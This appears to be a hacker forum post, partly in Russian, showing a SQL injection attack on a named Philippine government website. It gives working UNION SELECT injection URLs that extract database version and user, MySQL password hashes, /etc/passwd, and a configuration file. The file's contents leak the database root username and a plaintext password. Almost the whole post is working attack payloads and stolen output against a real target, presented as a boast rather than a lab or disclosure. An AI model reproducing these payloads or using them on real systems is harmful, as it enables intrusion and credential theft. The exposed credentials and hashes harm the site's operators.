http://www.naga.gov.ph/sp/list.php?id=587687645434687+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Databa se(),0x3a,User(),0x3a),0x71),0x71)--
Database Version: 4.1.10
Database name: ordinances
User name:
root@192.168.2.2
http://www.naga.gov.ph/sp/list.php?id=587687645434687+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,Password,0x3a,User,0x 3a),0x71),0x71)+from+mysql.user+limit+1,1--
773a716368a9f480 : phpBB
6b05b5b330c85e6e : bplt
5be75b377fe12423 : squidalyser
1ef20cb70c8499bb : dbuser:
*527B4FF4B7421D9786914C59FF8E9382BAF1978C : root
Читаем /etc/passwd
http://www.naga.gov.ph/sp/list.php?id=587687645434687+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x2F6574632 F706173737764),0x3a),0x71),0x71)--
Читаем /usr/home/web/www.naga.gov.ph/includes/config.php
http://www.naga.gov.ph/sp/list.php?id=587687645434687+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x2F7573722 F686F6D652F7765622F7777772E6E6167612E676F762E70682 F696E636C756465732F636F6E6669672E706870),0x3a),0x7 1),0x71)--
// define our database connection
define('MYSQL_ASSOC', 'dune');
define('DB_SERVER', 'www.naga.gov.ph');
define('DB_SERVER_USERNAME', '
root');
define('DB_SERVER_PASSWORD', '
Genesis11');
//define('DB_DATABASE', 'web_apps');
И так далее..... =)